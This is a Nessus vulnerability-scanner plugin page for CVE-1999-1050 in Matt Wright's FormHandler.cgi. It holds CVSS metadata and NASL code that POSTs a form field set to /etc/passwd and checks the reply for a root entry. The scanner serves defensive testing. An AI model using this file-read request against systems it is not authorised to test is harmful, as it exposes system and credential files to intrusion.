CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
Percentile
88.9%
The ‘FormHandler.cgi’ CGI application installed on the remote host is affected by an information disclosure vulnerability that lets anyone read arbitrary files with the privileges of the web server. An unauthenticated, remote attacker can exploit this to disclose sensitive information, which could be used to facilitate further attacks.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(10075);
script_version("1.42");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-1999-1050");
script_bugtraq_id(799);
script_name(english:"Matt Wright FormHandler.cgi Arbitrary File Access");
script_summary(english:"Attempts to read /etc/passwd.");
script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host is affected by an information
disclosure vulnerability." );
script_set_attribute(attribute:"description", value:
"The 'FormHandler.cgi' CGI application installed on the remote host is
affected by an information disclosure vulnerability that lets anyone
read arbitrary files with the privileges of the web server. An
unauthenticated, remote attacker can exploit this to disclose
sensitive information, which could be used to facilitate further
attacks.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/166");
script_set_attribute(attribute:"solution", value:
"Remove FormHandler.cgi from the web server.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:U/RC:X");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-1999-1050");
script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/11");
script_set_attribute(attribute:"plugin_publication_date", value: "1999/12/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 1999-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencie("http_version.nasl", "smtp_settings.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
domain = get_kb_item("Settings/third_party_domain");
if(!domain) domain = "example.com";
url = '/FormHandler.cgi';
header = make_array("Content-type", "application/x-www-form-urlencoded");
postdata = string(
"realname=", SCRIPT_NAME, "&",
"email=aaa&",
"reply_message_template=%2Fetc%2Fpasswd&",
"reply_message_from=nessus%40", domain, "&",
"redirect=http%3A%2F%2Fwww.", domain, "&",
"recipient=nessus%40", domain
);
res = http_send_recv3(
method:"POST",
item:url,
port:port,
add_headers:header,
data:postdata
);
if (isnull(res)) exit(1, "The server on port "+port+" didn't respond.");
if(egrep(pattern:"root:.*:0:[01]:.*", string:res[2])) security_warning(port);